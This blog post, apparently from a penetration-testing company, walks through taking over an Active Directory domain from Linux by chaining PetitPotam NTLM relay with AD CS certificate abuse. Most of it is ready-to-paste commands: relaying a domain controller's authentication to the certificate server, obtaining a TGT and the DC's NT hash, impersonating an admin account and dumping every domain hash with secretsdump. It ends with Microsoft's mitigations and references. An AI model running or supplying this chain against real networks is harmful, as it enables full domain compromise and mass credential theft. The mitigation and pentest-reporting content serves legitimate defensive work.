The ultimate tag team: PetitPotam and ADCS pwnage from Linux
Go from network access to DA ;-)
PetitPotam and ADCS exploitation are nothing short of amazing. Exploitation is a breeze and results in full domain admin access.
With these two TTPs, an attacker can hop on a network, exploit the vulnerability, do some command-line magic and have local administrator privileges on a domain controller in under 15 minutes. So far, no one has detailed the exploitation process fully on Linux and that’s what we’re going to do today.
Detecting the Vulnerability
Collect the following information to exploit this vulnerability:
- A list of domain controllers on the network:
How to identify Domain Controllers on the network - The company CA server and respective endpoints
Once you have the above information, first test that one of the domain controllers is vulnerable to PetitPotam:
If it is, awesome. Let’s push on to next steps.
Getting impacket
Once the vulnerability is confirmed, clone ExAdndroidDev’s fork of Impacket and switch to the correct branch:
git clone https://github.com/ExAndroidDev/impacket && \
cd impacket && \
git checkout ntlmrelayx-adcs-attack && \
pipenv --python 3 shell
Once in the virtual environment with the correct branch, install Impacket:
python3 setup.py install
Getting ntlmrelayx up and running
You can now execute the following command to start listening for inbound authentication attempts from the domain controller targeted with PetitPotam:
python3 examples/ntlmrelayx.py -debug -smb2support --target http://10.196.1.20/certsrv/default.asp --template DomainController --adcs
Hit enter and you should see something similar to this:
Getting the PFX
Execute PetitPotam again and you’ll receive a request inbound to ntlmrelayx and generate a base64 encoded PFX blob:
Copy the base64 output to a file for later use.
Installing PKINITtools
We need to now clone and install DirkJam’s PKINITtools:
git clone https://github.com/dirkjanm/PKINITtools && \
cd PKINITtools && \
pipenv --python 3 shell
After the python virtual environment is initialized, execute the following command to install the required packages:
pip3 install -r requirements.txt
Decoding the certificate
Using the Base64 blob you wrote to a file, decode its contents and write it to a separate file using a command similar to the one below:
cat crt.pfx.b64 | base64 -d > crt.pfx
We have to do this by hand, even though DirkJam’s tooling appears to support Base64 PFX files. That’s because we had issues with the functionality while using gettgtpkinit.py. It may work for you, though. Try it out.
Using gettgtpkinit.py
Using the DirkJam tool gettgtpkinit.py, get your TGT:
python3 gettgtpkinit.py acme.org/DC01\$ -cert-pfx crt.pfx out.ccache
You need the following for the command to work:
- The internal domain name (acme.org)
- The hostname of the DC you triggered authentication with using PetitPotam. Don’t forget to escape the $ with a backslash
- Decoded version of the Base64 PFX you just generated with ntlmrelayx
Following the execution of the command below, you’ll see output similar to what is shown below and also receive TGT output to the ccache file specified earlier:
Getting the NT hash
Save this output and ccache file. We’ll use it to access the domain controller we attacked. Execute the following command to get the NT hash for the domain controller:
KRB5CCNAME=out.ccache python3 getnthash.py acme.org/DC01\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773
You need the following for the command to work:
- The internal domain name (acme.org)
- The hostname of the DC you triggered authentication with using PetitPotam. Don’t forget to escape the $
- The generated AS-REP key you got from gettgtpkinit.py
- The generated TGT ccache file you got from gettgtpkinit.py
After you hit enter, you’ll pull the NT hash for the target domain controller:
This is awesome because we can now authenticate to the domain, but we still want to be able to impersonate domain administrators and perform other attacks. Let’s get a silver ticket.
Finding a user to impersonate
First, let’s grab a list of administrator users using the hash above and crackmapexec:
crackmapexec ldap DC01.acme.org -u DC01\$ -H 2cf2e96d892263276b95861017e2ce27 --admin-count
You need the following for the command to work:
- The NT hash you just extracted
- The hostname of the domain controller you’re targeting
- Crackmapexec installed
Following the execution of this command, you’ll now have a list of users and groups with administrative permissions in the domain. One of the accounts in our output is listed below:
- VeeamBackup
Silver Surfing
This user most likely has local administrator access to the domain controllers and all other servers on the network. Let’s get a silver ticket for this user and start authenticating to services.
DirkJam’s command for doing this is quite long, so I’ve included it below for easy copy and paste:
KRB5CCNAME=out.ccache python3 gets4uticket.py kerberos+ccache://acme.org\\DC01\$:out.ccache@DC01.acme.org cifs/DC01.acme.org@acme.org VeeamBackup@acme.org VeeamBackup.ccache -v
Note that you need the following for the command to work:
- The hostname of the domain controller you’re targeting
- The generated ccache file you got from gettgtpkinit.py
- A user to target and pull a silver ticket for
- The internal domain name
Getting everything
After executing this command, you’ll now have a ccache file for the account VeeamBackup. you can use that ccache file to authenticate to the same domain controller as a local administrator. For example, you can execute secretsdump now:
KRB5CCNAME=VeeamBackup.ccache python3 examples/secretsdump.py -just-dc-ntlm -user-status -debug -k acme.org/VeeamBackup@DC01.acme.org -no-pass -outputfile DC01.acme.org.secretsdump
Wrap up
When this is all said and done, you get domain admin in 20 minutes or less. This is beyond devastating and honestly the biggest exploitation path since ETERNALBLUE in our opinion.
We’ve already used this TTP on engagements, and I can tell you right now, it basically feels like cheating.
Make sure to use this article to exploit and report on these vulnerabilities as soon as possible. Let your customers know the risk and ensure they understand the speed in which you were able to take over their network.
To mitigate these vulnerabilities, instate the following controls:
- Implement LDAP signing and channel binding wherever possible
- Enable EPA for Certificate Authority Web Enrollment in IIS on internal certificate authority servers
- Enable EPA for Certificate Enrollment Web Service in IIS on internal certificate authority servers
- Disable NTLM Authentication on your Windows domain controller (pipe dream, we know)
- Disable NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the “Certificate Authority Web Enrollment” or “Certificate Enrollment Web Service” services.
These recommendations come from Microsoft and will stop this attack dead in its tracks.
Shout-outs and references
A lot of this article was cribbed from the work done by DirkJam. See more in the article below:
NTLM relaying to AD CS - On certificates, printers and a little hippo
https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
I did not expect NTLM relaying to be a big topic again in the summer of 2021, but among printing nightmares and bad ACLs on registry hives, there has been quite some discussion around this topic again.
ExAndroidDev’s fork of Impacket is a pivotal part of this attack, and they laid the groundwork for most of the ADCS exploitation paths out now:
AD CS relay attack - practical guide
https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/
Unless you are living under the rock, you have seen that recently @harmj0y and @tifkin_ published their amazing research on Active Directory Certificate Services (AD CS). If you haven't checked it out already read their post first. While reading their research, one specific
Remediation recommendations are taken straight from the horse’s mouth (Microsoft):
KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)
https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429
Microsoft is aware of PetitPotam which can potentially be used to attack Windows domain controllers or other Windows servers. PetitPotam is a classic NTLM Relay Attack, and such attacks have been previously documented by Microsoft along with numerous mitigation options to protect customers.
Of course we can’t forget the work from SpectreOps on ADCS:
Certified Pre-Owned
https://posts.specterops.io/certified-pre-owned-d95910965cd2
TL;DR Active Directory Certificate Services has a lot of attack potential! Check out our whitepaper " Certified Pre-Owned: Abusing Active Directory Certificate Services " for complete details. We're also presenting this material at Black Hat USA 2021.
Continuous Human & Automated Security
The Expert-Driven Offensive
Security Platform
Continuously monitor your attack surface with advanced change detection. Upon change, testers and systems perform security testing. You are alerted and assisted in remediation efforts all contained in a single security application, the Sprocket Platform.
Expert-Driven Offensive Security Platform
- Attack Surface Management
- Continuous Penetration Testing
- Adversary Simulations